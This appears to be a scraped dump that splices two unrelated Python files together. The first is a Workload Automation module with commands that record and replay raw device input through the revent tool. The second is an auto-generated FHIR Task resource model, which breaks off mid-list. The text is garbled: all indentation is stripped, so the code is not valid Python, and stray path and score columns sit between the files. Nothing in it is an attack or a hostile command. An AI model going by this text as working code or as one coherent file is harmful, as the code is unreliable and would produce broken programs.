        # onto the source line; the logical statement is self.resolver.load().
        self.resolver.load() | wlauto/commands/record.py |
import os
import sys
import signal
from math import ceil
from wlauto import ExtensionLoader, Command, settings
from wlauto.common.resources import Executable
from wlauto.core.resource import NO_ONE
from wlauto.core.resolver import ResourceResolver
from wlauto.core.configuration import RunConfiguration
from wlauto.core.agenda import Agenda
from wlauto.utils.revent import ReventRecording, GAMEPAD_MODE
class ReventCommand(Command):
# Validate command options
def validate_args(self, args):
if args.clear and not args.package:
print "Package must be specified if you want to clear cache\n"
self.parser.print_help()
sys.exit()
# pylint: disable=W0201
def execute(self, args):
self.validate_args(args)
self.logger.info("Connecting to device...")
ext_loader = ExtensionLoader(packages=settings.extension_packages,
paths=settings.extension_paths)
# Setup config
self.config = RunConfiguration(ext_loader)
for filepath in settings.get_config_paths():
self.config.load_config(filepath)
self.config.set_agenda(Agenda())
self.config.finalize()
context = LightContext(self.config)
# Setup device
self.device = ext_loader.get_device(settings.device, **settings.device_config)
self.device.validate()
self.device.dynamic_modules = []
self.device.connect()
self.device.initialize(context)
host_binary = context.resolver.get(Executable(NO_ONE, self.device.abi, 'revent'))
self.target_binary = self.device.install_executable(host_binary)
self.run(args)
def run(self, args):
raise NotImplementedError()
class RecordCommand(ReventCommand):
name = 'record'
description = '''Performs a revent recording
This command helps create revent recordings. It will automatically
deploy revent and even has the option of automatically opening apps.
Revent allows you to record raw inputs such as screen swipes or button presses.
This can be useful for recording inputs for workloads such as games that don't
have XML UI layouts that can be used with UIAutomator. As a drawback from this,
revent recordings are specific to the device type they were recorded on.
WA uses two parts to form the names of revent recordings in the format,
{device_name}.{suffix}.revent
- device_name can either be specified manually with the ``-d`` argument or
else the name of the device will be automatically determined. On an Android device it is obtained
from ``build.prop``, on Linux devices it is obtained from ``/proc/device-tree/model``.
- suffix is used by WA to determine which part of the app execution the
recording is for, currently either ``setup``, ``run`` or ``teardown``. This
should be specified with the ``-s`` argument.
**gamepad recording**
revent supports an alternative recording mode, where it will record events
from a single gamepad device. In this mode, revent will store the
description of this device as a part of the recording. When replaying such
a recording, revent will first create a virtual gamepad using the
description, and will replay the events into it, so a physical controller
does not need to be connected on replay. Unlike standard revent recordings,
recordings generated in this mode should be (to an extent) portable across
different devices.
note:
- The device on which a recording is being made in gamepad mode, must have
exactly one gamepad connected to it.
- The device on which a gamepad recording is being replayed must have
/dev/uinput enabled in the kernel (this interface is necessary to create
virtual gamepad).
'''
def initialize(self, context):
self.context = context
self.parser.add_argument('-d', '--device', help='The name of the device')
self.parser.add_argument('-s', '--suffix', help='The suffix of the revent file, e.g. ``setup``')
self.parser.add_argument('-o', '--output', help='Directory to save the recording in')
self.parser.add_argument('-p', '--package', help='Package to launch before recording')
self.parser.add_argument('-g', '--gamepad', help='Record from a gamepad rather than all devices.',
action="store_true")
self.parser.add_argument('-C', '--clear', help='Clear app cache before launching it',
action="store_true")
self.parser.add_argument('-S', '--capture-screen', help='Record a screen capture after recording',
action="store_true")
def run(self, args):
if args.device:
device_name = args.device
else:
device_name = self.device.get_device_model()
if args.suffix:
args.suffix += "."
revent_file = self.device.path.join(self.device.working_directory,
'{}.{}revent'.format(device_name, args.suffix or ""))
if args.clear:
self.device.execute("pm clear {}".format(args.package))
if args.package:
self.logger.info("Starting {}".format(args.package))
self.device.execute('monkey -p {} -c android.intent.category.LAUNCHER 1'.format(args.package))
self.logger.info("Press Enter when you are ready to record...")
raw_input("")
gamepad_flag = '-g ' if args.gamepad else ''
command = "{} record {}-s {}".format(self.target_binary, gamepad_flag, revent_file)
self.device.kick_off(command)
self.logger.info("Press Enter when you have finished recording...")
raw_input("")
if args.capture_screen:
self.logger.info("Recording screen capture")
self.device.capture_screen(args.output or os.getcwdu())
self.device.killall("revent", signal.SIGINT)
self.logger.info("Waiting for revent to finish")
while self.device.get_pids_of("revent"):
pass
self.logger.info("Pulling files from device")
self.device.pull_file(revent_file, args.output or os.getcwdu())
class ReplayCommand(ReventCommand):
name = 'replay'
description = '''Replay a revent recording
Revent allows you to record raw inputs such as screen swipes or button presses.
See ``wa show record`` to see how to make an revent recording.
'''
def initialize(self, context):
self.context = context
self.parser.add_argument('revent', help='The name of the file to replay')
self.parser.add_argument('-p', '--package', help='Package to launch before recording')
self.parser.add_argument('-C', '--clear', help='Clear app cache before launching it',
action="store_true")
# pylint: disable=W0201
def run(self, args):
self.logger.info("Pushing file to device")
self.device.push_file(args.revent, self.device.working_directory)
revent_file = self.device.path.join(self.device.working_directory, os.path.split(args.revent)[1])
if args.clear:
self.device.execute("pm clear {}".format(args.package))
if args.package:
self.logger.info("Starting {}".format(args.package))
self.device.execute('monkey -p {} -c android.intent.category.LAUNCHER 1'.format(args.package))
self.logger.info("Replaying recording")
command = "{} replay {}".format(self.target_binary, revent_file)
recording = ReventRecording(args.revent)
timeout = ceil(recording.duration) + 30
recording.close()
self.device.execute(command, timeout=timeout,
as_root=(recording.mode == GAMEPAD_MODE))
self.logger.info("Finished replay")
# Used to satisfy the API
class LightContext(object):
def __init__(self, config):
self.resolver = ResourceResolver(config)
self.resolver.load() | 0.440951 | 0.115836 |
from .fhirbase import fhirbase
class Task(fhirbase):
"""
A task to be performed.
Attributes:
resourceType: This is a Task resource
identifier: The business identifier for this task.
definitionUri: A reference to a formal or informal definition of the
task. For example, a protocol, a step within a defined workflow
definition, etc.
definitionReference: A reference to a formal or informal definition of
the task. For example, a protocol, a step within a defined workflow
definition, etc.
basedOn: BasedOn refers to a higher-level authorization that triggered
the creation of the task. It references a "request" resource such as
a ProcedureRequest, MedicationRequest, ProcedureRequest, CarePlan,
etc. which is distinct from the "request" resource the task is seeking
to fulfil. This latter resource is referenced by FocusOn. For
example, based on a ProcedureRequest (= BasedOn), a task is created to
fulfil a procedureRequest ( = FocusOn ) to collect a specimen from a
patient.
groupIdentifier: An identifier that links together multiple tasks and
other requests that were created in the same context.
partOf: Task that this particular task is part of.
status: The current status of the task.
statusReason: An explanation as to why this task is held, failed, was
refused, etc.
businessStatus: Contains business-specific nuances of the business
state.
intent: Indicates the "level" of actionability associated with the
Task. I.e. Is this a proposed task, a planned task, an actionable
task, etc.
priority: Indicates how quickly the Task should be addressed with
respect to other requests.
code: A name or code (or both) briefly describing what the task
involves.
description: A free-text description of what is to be performed.
focus: The request being actioned or the resource being manipulated by
this task.
for: The entity who benefits from the performance of the service
specified in the task (e.g., the patient).
context: The healthcare event (e.g. a patient and healthcare provider
interaction) during which this task was created.
executionPeriod: Identifies the time action was first taken against
the task (start) and/or the time final action was taken against the
task prior to marking it as completed (end).
authoredOn: The date and time this task was created.
lastModified: The date and time of last modification to this task.
requester: The creator of the task.
performerType: The type of participant that can execute the task.
owner: Individual organization or Device currently responsible for
task execution.
reason: A description or code indicating why this task needs to be
performed.
note: Free-text information captured about the task as it progresses.
relevantHistory: Links to Provenance records for past versions of this
Task that identify key state transitions or updates that are likely to
be relevant to a user looking at the current version of the task.
restriction: If the Task.focus is a request resource and the task is
seeking fulfillment (i.e is asking for the request to be actioned),
this element identifies any limitations on what parts of the
referenced request should be actioned.
input: Additional information that may be needed in the execution of
the task.
output: Outputs produced by the Task.
"""
__name__ = 'Task'
def __init__(self, dict_values=None):
self.resourceType = 'Task'
# type: str
# possible values: Task
self.definitionUri = None
# type: str
self.definitionReference = None
# reference to Reference: identifier
self.basedOn = None
# type: list
# reference to Reference: identifier
self.groupIdentifier = None
# reference to Identifier
self.partOf = None
# type: list
# reference to Reference: identifier
self.status = None
# type: str
# possible values: draft, requested, received, accepted,
# rejected, ready, cancelled, in-progress, on-hold, failed, completed,
# entered-in-error
self.statusReason = None
# reference to CodeableConcept
self.businessStatus = None
# reference to CodeableConcept
self.intent = None
# type: str
self.priority = None
# type: str
self.code = None
# reference to CodeableConcept
self.description = None
# type: str
self.focus = None
# reference to Reference: identifier
self._for = None
# reference to Reference: identifier
self.context = None
# reference to Reference: identifier
self.executionPeriod = None
# reference to Period
self.authoredOn = None
# type: str
self.lastModified = None
# type: str
self.requester = None
# reference to Task_Requester
self.performerType = None
# type: list
# reference to CodeableConcept
self.owner = None
# reference to Reference: identifier
self.reason = None
# reference to CodeableConcept
self.note = None
# type: list
# reference to Annotation
self.relevantHistory = None
# type: list
# reference to Reference: identifier
self.restriction = None
# reference to Task_Restriction
self.input = None
# type: list
# reference to Task_Input
self.output = None
# type: list
# reference to Task_Output
self.identifier = None
# type: list
# reference to Identifier
if dict_values:
self.set_attributes(dict_values)
self.assert_type()
def assert_type(self):
if self.status is not None:
for value in self.status:
if value is not None and value.lower() not in [
'draft', 'requested', 'received', 'accepted', 'rejected', 'ready',
'cancelled', 'in-progress', 'on-hold', 'failed', 'completed',
'entered-in-error']:
raise ValueError('"{}" does not match possible values: {}'.format(
value, 'draft, requested, received, accepted, rejected, ready, cancelled,'
'in-progress, on-hold, failed, completed, entered-in-error'))
def get_relationships(self):
return [
{'parent_entity': 'Reference',
'parent_variable': 'identifier',
'child_entity': 'Task',
'child_variable': 'context'},
{'parent_entity': 'Identifier',
'parent_variable': 'object_id',
'child_entity': 'Task',
'child_variable': 'identifier'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'Task',
'child_variable': 'performerType'},
{'parent_entity': 'Task_Restriction',
'parent_variable': 'object_id',
'child_entity': 'Task',
'child_variable': 'restriction'},
{'parent_entity': 'Period',
'parent_variable': 'object_id',
'child_entity': 'Task',
'child_variable': 'executionPeriod'},
{'parent_entity': 'Reference',
'parent_variable': 'identifier',
'child_entity': 'Task',
'child_variable': 'basedOn'},
{'parent_entity': 'Reference',
'parent_variable': 'identifier',
'child_entity': 'Task',
'child_variable': 'focus'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'Task',
'child_variable': 'reason'},
{'parent_entity': 'Annotation',
'parent_variable': 'object_id',
'child_entity': 'Task',
'child_variable': 'note'},
{'parent_entity': 'Task_Input',
'parent_variable': 'object_id',
'child_entity': 'Task',
'child_variable': 'input'},
{'parent_entity': 'Reference',
'parent_variable': 'identifier',
'child_entity': 'Task',
'child_variable': 'relevantHistory'},
{'parent_entity': 'Task_Requester',
'parent_variable': 'object_id',
'child_entity': 'Task',
'child_variable': 'requester'},
{'parent_entity': 'Reference',
'parent_variable': 'identifier',
'child_entity': 'Task',
'child_variable': 'definitionReference'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'Task',
'child_variable': 'code'},
{'parent_entity': 'Reference',
'parent_variable': 'identifier',
'child_entity': 'Task',
'child_variable': 'owner'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'Task',
'child_variable': 'statusReason'},
{'parent_entity': 'Identifier',
'parent_variable': 'object_id',
'child_entity': 'Task',
'child_variable': 'groupIdentifier'},
{'parent_entity': 'Reference',
'parent_variable': 'identifier',
'child_entity': 'Task',
'child_variable': 'partOf'},
{'parent_entity': 'Reference',
'parent_variable': 'identifier',
'child_entity': 'Task',
'child_variable': '_for'},
{'parent_entity': 'Task_Output',
'parent_variable': 'object_id',
'child_entity': 'Task',
'child_variable': 'output'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'Task',
'child_variable': 'businessStatus'},
]
class Task_Requester(fhirbase):
"""
A task to be performed.
Attributes:
agent: The device, practitioner, etc. who initiated the task.
onBehalfOf: The organization the device or practitioner was acting on
behalf of when they initiated the task.
"""
__name__ = 'Task_Requester'
def __init__(self, dict_values=None):
self.agent = None
# reference to Reference: identifier
self.onBehalfOf = None
# reference to Reference: identifier
self.object_id = None
# unique identifier for object class
if dict_values:
self.set_attributes(dict_values)
def get_relationships(self):
return [
{'parent_entity': 'Reference',
'parent_variable': 'identifier',
'child_entity': 'Task_Requester',
'child_variable': 'onBehalfOf'},
{'parent_entity': 'Reference',
'parent_variable': 'identifier',
'child_entity': 'Task_Requester',
'child_variable': 'agent'},
]
class Task_Restriction(fhirbase):
"""
A task to be performed.
Attributes:
repetitions: Indicates the number of times the requested action should
occur.
period: Over what time-period is fulfillment sought.
recipient: For requests that are targeted to more than on potential
recipient/target, for whom is fulfillment sought?
"""
__name__ = 'Task_Restriction'
def __init__(self, dict_values=None):
self.repetitions = None
# type: int
self.period = None
# reference to Period
self.recipient = None
# type: list
# reference to Reference: identifier
self.object_id = None
# unique identifier for object class
if dict_values:
self.set_attributes(dict_values)
def get_relationships(self):
return [
{'parent_entity': 'Period',
'parent_variable': 'object_id',
'child_entity': 'Task_Restriction',
'child_variable': 'period'},
{'parent_entity': 'Reference',
'parent_variable': 'identifier',
'child_entity': 'Task_Restriction',
'child_variable': 'recipient'},
]
class Task_Input(fhirbase):
"""
A task to be performed.
Attributes:
type: A code or description indicating how the input is intended to be
used as part of the task execution.
valueBoolean: The value of the input parameter as a basic type.
valueInteger: The value of the input parameter as a basic type.
valueDecimal: The value of the input parameter as a basic type.
valueBase64Binary: The value of the input parameter as a basic type.
valueInstant: The value of the input parameter as a basic type.
valueString: The value of the input parameter as a basic type.
valueUri: The value of the input parameter as a basic type.
valueDate: The value of the input parameter as a basic type.
valueDateTime: The value of the input parameter as a basic type.
valueTime: The value of the input parameter as a basic type.
valueCode: The value of the input parameter as a basic type.
valueOid: The value of the input parameter as a basic type.
valueUuid: The value of the input parameter as a basic type.
valueId: The value of the input parameter as a basic type.
valueUnsignedInt: The value of the input parameter as a basic type.
valuePositiveInt: The value of the input parameter as a basic type.
valueMarkdown: The value of the input parameter as a basic type.
valueElement: The value of the input parameter as a basic type.
valueExtension: The value of the input parameter as a basic type.
valueBackboneElement: The value of the input parameter as a basic
type.
valueNarrative: The value of the input parameter as a basic type.
valueAnnotation: The value of the input parameter as a basic type.
valueAttachment: The value of the input parameter as a basic type.
valueIdentifier: The value of the input parameter as a basic type.
valueCodeableConcept: The value of the input parameter as a basic
type.
valueCoding: The value of the input parameter as a basic type.
valueQuantity: The value of the input parameter as a basic type.
valueDuration: The value of the input parameter as a basic type.
valueSimpleQuantity: The value of the input parameter as a basic type.
valueDistance: The value of the input parameter as a basic type.
valueCount: The value of the input parameter as a basic type.
valueMoney: The value of the input parameter as a basic type.
valueAge: The value of the input parameter as a basic type.
valueRange: The value of the input parameter as a basic type.
valuePeriod: The value of the input parameter as a basic type.
valueRatio: The value of the input parameter as a basic type.
valueReference: The value of the input parameter as a basic type.
valueSampledData: The value of the input parameter as a basic type.
valueSignature: The value of the input parameter as a basic type.
valueHumanName: The value of the input parameter as a basic type.
valueAddress: The value of the input parameter as a basic type.
valueContactPoint: The value of the input parameter as a basic type.
valueTiming: The value of the input parameter as a basic type.
valueMeta: The value of the input parameter as a basic type.
valueElementDefinition: The value of the input parameter as a basic
type.
valueContactDetail: The value of the input parameter as a basic type.
valueContributor: The value of the input parameter as a basic type.
valueDosage: The value of the input parameter as a basic type.
valueRelatedArtifact: The value of the input parameter as a basic
type.
valueUsageContext: The value of the input parameter as a basic type.
valueDataRequirement: The value of the input parameter as a basic
type.
valueParameterDefinition: The value of the input parameter as a basic
type.
valueTriggerDefinition: The value of the input parameter as a basic
type.
"""
__name__ = 'Task_Input'
def __init__(self, dict_values=None):
self.type = None
# reference to CodeableConcept
self.valueBoolean = None
# type: bool
self.valueInteger = None
# type: int
self.valueDecimal = None
# type: int
self.valueBase64Binary = None
# type: str
self.valueInstant = None
# type: str
self.valueString = None
# type: str
self.valueUri = None
# type: str
self.valueDate = None
# type: str
self.valueDateTime = None
# type: str
self.valueTime = None
# type: str
self.valueCode = None
# type: str
self.valueOid = None
# type: str
self.valueUuid = None
# type: str
self.valueId = None
# type: str
self.valueUnsignedInt = None
# type: int
self.valuePositiveInt = None
# type: int
self.valueMarkdown = None
# type: str
self.valueElement = None
# reference to Element: id
self.valueExtension = None
# reference to Extension
self.valueBackboneElement = None
# reference to BackboneElement
self.valueNarrative = None
# reference to Narrative
self.valueAnnotation = None
# reference to Annotation
self.valueAttachment = None
# reference to Attachment
self.valueIdentifier = None
# reference to Identifier
self.valueCodeableConcept = None
# reference to CodeableConcept
self.valueCoding = None
# reference to Coding
self.valueQuantity = None
# reference to Quantity
self.valueDuration = None
# reference to Duration
self.valueSimpleQuantity = None
# reference to Quantity
self.valueDistance = None
# reference to Distance
self.valueCount = None
# reference to Count
self.valueMoney = None
# reference to Money
self.valueAge = None
# reference to Age
self.valueRange = None
# reference to Range
self.valuePeriod = None
# reference to Period
self.valueRatio = None
# reference to Ratio
self.valueReference = None
# reference to Reference: identifier
self.valueSampledData = None
# reference to SampledData
self.valueSignature = None
# reference to Signature
self.valueHumanName = None
# reference to HumanName
self.valueAddress = None
# reference to Address
self.valueContactPoint = None
# reference to ContactPoint
self.valueTiming = None
# reference to Timing
self.valueMeta = None
# reference to Meta
self.valueElementDefinition = None
# reference to ElementDefinition
self.valueContactDetail = None
# reference to ContactDetail
self.valueContributor = None
# reference to Contributor
self.valueDosage = None
# reference to Dosage
self.valueRelatedArtifact = None
# reference to RelatedArtifact
self.valueUsageContext = None
# reference to UsageContext
self.valueDataRequirement = None
# reference to DataRequirement
self.valueParameterDefinition = None
# reference to ParameterDefinition
self.valueTriggerDefinition = None
# reference to TriggerDefinition
self.object_id = None
# unique identifier for object class
if dict_values:
self.set_attributes(dict_values)
def get_relationships(self):
return [
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'Task_Input',
'child_variable': 'valueCodeableConcept'},
{'parent_entity': 'ContactDetail',
'parent_variable': 'object_id',
'child_entity': 'Task_Input',
'child_variable': 'valueContactDetail'},
{'parent_entity': 'Contributor',
'parent_variable': 'object_id',
'child_entity': 'Task_Input',
'child_variable': 'valueContributor'},
{'parent_entity': 'RelatedArtifact',
'parent_variable': 'object_id',
'child_entity': 'Task_Input',
'child_variable': 'valueRelatedArtifact'},
{'parent_entity': 'Identifier',
'parent_variable': 'object_id',
'child_entity': 'Task_Input',
'child_variable': 'valueIdentifier'},
{'parent_entity': 'Attachment',
'parent_variable': 'object_id',
'child_entity': 'Task_Input',
'child_variable': 'valueAttachment'},
{'parent_entity': 'Meta',
'parent_variable': 'object_id',
'child_entity': 'Task_Input',
'child_variable': 'valueMeta'},
{'parent_entity': 'Quantity',
'parent_variable': 'object_id',
'child_entity': 'Task_Input',
'child_variable': 'valueSimpleQuantity'},
{'parent_entity': 'Extension',
'parent_variable': 'object_id',
'child_entity': 'Task_Input',
'child_variable': 'valueExtension'},
{'parent_entity': 'Address',
'parent_variable': 'object_id',
'child_entity': 'Task_Input',
'child_variable': 'valueAddress'},
{'parent_entity': 'Period',
'parent_variable': 'object_id',
'child_entity': 'Task_Input',
'child_variable': 'valuePeriod'},
{'parent_entity': 'DataRequirement',
'parent_variable': 'object_id',
'child_entity': 'Task_Input',
'child_variable': 'valueDataRequirement'},
{'parent_entity': 'Quantity',
'parent_variable': 'object_id',
'child_entity': 'Task_Input',
'child_variable': 'valueQuantity'},
{'parent_entity': 'Reference',
'parent_variable': 'identifier',
'child_entity': 'Task_Input',
'child_variable': 'valueReference'},
{'parent_entity': 'TriggerDefinition',
'parent_variable': 'object_id',
'child_entity': 'Task_Input',
'child_variable': 'valueTriggerDefinition'},
{'parent_entity': 'Duration',
'parent_variable': 'object_id',
'child_entity': 'Task_Input',
'child_variable': 'valueDuration'},
{'parent_entity': 'ElementDefinition',
'parent_variable': 'object_id',
'child_entity': 'Task_Input',
'child_variable': 'valueElementDefinition'},
{'parent_entity': 'Money',
'parent_variable': 'object_id',
'child_entity': 'Task_Input',
'child_variable': 'valueMoney'},
{'parent_entity': 'Range',
'parent_variable': 'object_id',
'child_entity': 'Task_Input',
'child_variable': 'valueRange'},
{'parent_entity': 'Signature',
'parent_variable': 'object_id',
'child_entity': 'Task_Input',
'child_variable': 'valueSignature'},
{'parent_entity': 'UsageContext',
'parent_variable': 'object_id',
'child_entity': 'Task_Input',
'child_variable': 'valueUsageContext'},
{'parent_entity': 'Coding',
'parent_variable': 'object_id',
'child_entity': 'Task_Input',
'child_variable': 'valueCoding'},
{'parent_entity': 'Dosage',
'parent_variable': 'object_id',
'child_entity': 'Task_Input',
'child_variable': 'valueDosage'},
{'parent_entity': 'Narrative',
'parent_variable': 'object_id',
'child_entity': 'Task_Input',
'child_variable': 'valueNarrative'},
{'parent_entity': 'Element',
'parent_variable': 'id',
'child_entity': 'Task_Input',
'child_variable': 'valueElement'},
{'parent_entity': 'Annotation',
'parent_variable': 'object_id',
'child_entity': 'Task_Input',
'child_variable': 'valueAnnotation'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'Task_Input',
'child_variable': 'type'},
{'parent_entity': 'Count',
'parent_variable': 'object_id',
'child_entity': 'Task_Input',
'child_variable': 'valueCount'},
{'parent_entity': 'Ratio',
'parent_variable': 'object_id',
'child_entity': 'Task_Input',
'child_variable': 'valueRatio'},
{'parent_entity': 'Distance',
'parent_variable': 'object_id',
'child_entity': 'Task_Input',
'child_variable': 'valueDistance'},
{'parent_entity': 'BackboneElement',
'parent_variable': 'object_id',
'child_entity': 'Task_Input',
'child_variable': 'valueBackboneElement'},
{'parent_entity': 'ContactPoint',
'parent_variable': 'object_id',
'child_entity': 'Task_Input',
'child_variable': 'valueContactPoint'},
{'parent_entity': 'Age',
'parent_variable': 'object_id',
'child_entity': 'Task_Input',
'child_variable': 'valueAge'},
{'parent_entity': 'Timing',
'parent_variable': 'object_id',
'child_entity': 'Task_Input',
'child_variable': 'valueTiming'},
{'parent_entity': 'ParameterDefinition',
'parent_variable': 'object_id',
'child_entity': 'Task_Input',
'child_variable': 'valueParameterDefinition'},
{'parent_entity': 'HumanName',
'parent_variable': 'object_id',
'child_entity': 'Task_Input',
'child_variable': 'valueHumanName'},
{'parent_entity': 'SampledData',
'parent_variable': 'object_id',
'child_entity': 'Task_Input',
'child_variable': 'valueSampledData'},
]
class Task_Output(fhirbase):
"""
A task to be performed.
Attributes:
type: The name of the Output parameter.
valueBoolean: The value of the Output parameter as a basic type.
valueInteger: The value of the Output parameter as a basic type.
valueDecimal: The value of the Output parameter as a basic type.
valueBase64Binary: The value of the Output parameter as a basic type.
valueInstant: The value of the Output parameter as a basic type.
valueString: The value of the Output parameter as a basic type.
valueUri: The value of the Output parameter as a basic type.
valueDate: The value of the Output parameter as a basic type.
valueDateTime: The value of the Output parameter as a basic type.
valueTime: The value of the Output parameter as a basic type.
valueCode: The value of the Output parameter as a basic type.
valueOid: The value of the Output parameter as a basic type.
valueUuid: The value of the Output parameter as a basic type.
valueId: The value of the Output parameter as a basic type.
valueUnsignedInt: The value of the Output parameter as a basic type.
valuePositiveInt: The value of the Output parameter as a basic type.
valueMarkdown: The value of the Output parameter as a basic type.
valueElement: The value of the Output parameter as a basic type.
valueExtension: The value of the Output parameter as a basic type.
valueBackboneElement: The value of the Output parameter as a basic
type.
valueNarrative: The value of the Output parameter as a basic type.
valueAnnotation: The value of the Output parameter as a basic type.
valueAttachment: The value of the Output parameter as a basic type.
valueIdentifier: The value of the Output parameter as a basic type.
valueCodeableConcept: The value of the Output parameter as a basic
type.
valueCoding: The value of the Output parameter as a basic type.
valueQuantity: The value of the Output parameter as a basic type.
valueDuration: The value of the Output parameter as a basic type.
valueSimpleQuantity: The value of the Output parameter as a basic
type.
valueDistance: The value of the Output parameter as a basic type.
valueCount: The value of the Output parameter as a basic type.
valueMoney: The value of the Output parameter as a basic type.
valueAge: The value of the Output parameter as a basic type.
valueRange: The value of the Output parameter as a basic type.
valuePeriod: The value of the Output parameter as a basic type.
valueRatio: The value of the Output parameter as a basic type.
valueReference: The value of the Output parameter as a basic type.
valueSampledData: The value of the Output parameter as a basic type.
valueSignature: The value of the Output parameter as a basic type.
valueHumanName: The value of the Output parameter as a basic type.
valueAddress: The value of the Output parameter as a basic type.
valueContactPoint: The value of the Output parameter as a basic type.
valueTiming: The value of the Output parameter as a basic type.
valueMeta: The value of the Output parameter as a basic type.
valueElementDefinition: The value of the Output parameter as a basic
type.
valueContactDetail: The value of the Output parameter as a basic type.
valueContributor: The value of the Output parameter as a basic type.
valueDosage: The value of the Output parameter as a basic type.
valueRelatedArtifact: The value of the Output parameter as a basic
type.
valueUsageContext: The value of the Output parameter as a basic type.
valueDataRequirement: The value of the Output parameter as a basic
type.
valueParameterDefinition: The value of the Output parameter as a basic
type.
valueTriggerDefinition: The value of the Output parameter as a basic
type.
"""
__name__ = 'Task_Output'
def __init__(self, dict_values=None):
self.type = None
# reference to CodeableConcept
self.valueBoolean = None
# type: bool
self.valueInteger = None
# type: int
self.valueDecimal = None
# type: int
self.valueBase64Binary = None
# type: str
self.valueInstant = None
# type: str
self.valueString = None
# type: str
self.valueUri = None
# type: str
self.valueDate = None
# type: str
self.valueDateTime = None
# type: str
self.valueTime = None
# type: str
self.valueCode = None
# type: str
self.valueOid = None
# type: str
self.valueUuid = None
# type: str
self.valueId = None
# type: str
self.valueUnsignedInt = None
# type: int
self.valuePositiveInt = None
# type: int
self.valueMarkdown = None
# type: str
self.valueElement = None
# reference to Element: id
self.valueExtension = None
# reference to Extension
self.valueBackboneElement = None
# reference to BackboneElement
self.valueNarrative = None
# reference to Narrative
self.valueAnnotation = None
# reference to Annotation
self.valueAttachment = None
# reference to Attachment
self.valueIdentifier = None
# reference to Identifier
self.valueCodeableConcept = None
# reference to CodeableConcept
self.valueCoding = None
# reference to Coding
self.valueQuantity = None
# reference to Quantity
self.valueDuration = None
# reference to Duration
self.valueSimpleQuantity = None
# reference to Quantity
self.valueDistance = None
# reference to Distance
self.valueCount = None
# reference to Count
self.valueMoney = None
# reference to Money
self.valueAge = None
# reference to Age
self.valueRange = None
# reference to Range
self.valuePeriod = None
# reference to Period
self.valueRatio = None
# reference to Ratio
self.valueReference = None
# reference to Reference: identifier
self.valueSampledData = None
# reference to SampledData
self.valueSignature = None
# reference to Signature
self.valueHumanName = None
# reference to HumanName
self.valueAddress = None
# reference to Address
self.valueContactPoint = None
# reference to ContactPoint
self.valueTiming = None
# reference to Timing
self.valueMeta = None
# reference to Meta
self.valueElementDefinition = None
# reference to ElementDefinition
self.valueContactDetail = None
# reference to ContactDetail
self.valueContributor = None
# reference to Contributor
self.valueDosage = None
# reference to Dosage
self.valueRelatedArtifact = None
# reference to RelatedArtifact
self.valueUsageContext = None
# reference to UsageContext
self.valueDataRequirement = None
# reference to DataRequirement
self.valueParameterDefinition = None
# reference to ParameterDefinition
self.valueTriggerDefinition = None
# reference to TriggerDefinition
self.object_id = None
# unique identifier for object class
if dict_values:
self.set_attributes(dict_values)
def get_relationships(self):
return [
{'parent_entity': 'Signature',
'parent_variable': 'object_id',
'child_entity': 'Task_Output',
'child_variable': 'valueSignature'},
{'parent_entity': 'Reference',
'parent_variable': 'identifier',
'child_entity': 'Task_Output',
'child_variable': 'valueReference'},
{'parent_entity': 'BackboneElement',
'parent_variable': 'object_id',
'child_entity': 'Task_Output',
'child_variable': 'valueBackboneElement'},
{'parent_entity': 'RelatedArtifact',
'parent_variable': 'object_id',
'child_entity': 'Task_Output',
'child_variable': 'valueRelatedArtifact'},
{'parent_entity': 'Quantity',
'parent_variable': 'object_id',
'child_entity': 'Task_Output',
'child_variable': 'valueSimpleQuantity'},
{'parent_entity': 'ContactPoint',
'parent_variable': 'object_id',
'child_entity': 'Task_Output',
'child_variable': 'valueContactPoint'},
{'parent_entity': 'Extension',
'parent_variable': 'object_id',
'child_entity': 'Task_Output',
'child_variable': 'valueExtension'},
{'parent_entity': 'Age',
'parent_variable': 'object_id',
'child_entity': 'Task_Output',
'child_variable': 'valueAge'},
{'parent_entity': 'Meta',
'parent_variable': 'object_id',
'child_entity': 'Task_Output',
'child_variable': 'valueMeta'},
{'parent_entity': 'Dosage',
'parent_variable': 'object_id',
'child_entity': 'Task_Output',
'child_variable': 'valueDosage'},
{'parent_entity': 'TriggerDefinition',
'parent_variable': 'object_id',
'child_entity': 'Task_Output',
'child_variable': 'valueTriggerDefinition'},
{'parent_entity': 'Distance',
'parent_variable': 'object_id',
'child_entity': 'Task_Output',
'child_variable': 'valueDistance'},
{'parent_entity': 'Coding',
'parent_variable': 'object_id',
'child_entity': 'Task_Output',
'child_variable': 'valueCoding'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'Task_Output',
'child_variable': 'valueCodeableConcept'},
{'parent_entity': 'ElementDefinition',
'parent_variable': 'object_id',
'child_entity': 'Task_Output',
'child_variable': 'valueElementDefinition'},
{'parent_entity': 'Period',
'parent_variable': 'object_id',
'child_entity': 'Task_Output',
'child_variable': 'valuePeriod'},
{'parent_entity': 'Identifier',
'parent_variable': 'object_id',
'child_entity': 'Task_Output',
'child_variable': 'valueIdentifier'},
{'parent_entity': 'DataRequirement',
'parent_variable': 'object_id',
'child_entity': 'Task_Output',
'child_variable': 'valueDataRequirement'},
{'parent_entity': 'SampledData',
'parent_variable': 'object_id',
'child_entity': 'Task_Output',
'child_variable': 'valueSampledData'},
{'parent_entity': 'Element',
'parent_variable': 'id',
'child_entity': 'Task_Output',
'child_variable': 'valueElement'},
{'parent_entity': 'HumanName',
'parent_variable': 'object_id',
'child_entity': 'Task_Output',
'child_variable': 'valueHumanName'},
{'parent_entity': 'Money',
'parent_variable': 'object_id',
'child_entity': 'Task_Output',
'child_variable': 'valueMoney'},
{'parent_entity': 'Quantity',
'parent_variable': 'object_id',
'child_entity': 'Task_Output',
'child_variable': 'valueQuantity'},
{'parent_entity': 'ContactDetail',
'parent_variable': 'object_id',
'child_entity': 'Task_Output',
'child_variable': 'valueContactDetail'},
{'parent_entity': 'Attachment',
'parent_variable': 'object_id',
'child_entity': 'Task_Output',
'child_variable': 'valueAttachment'},
{'parent_entity': 'Count',
'parent_variable': 'object_id',
'child_entity': 'Task_Output',
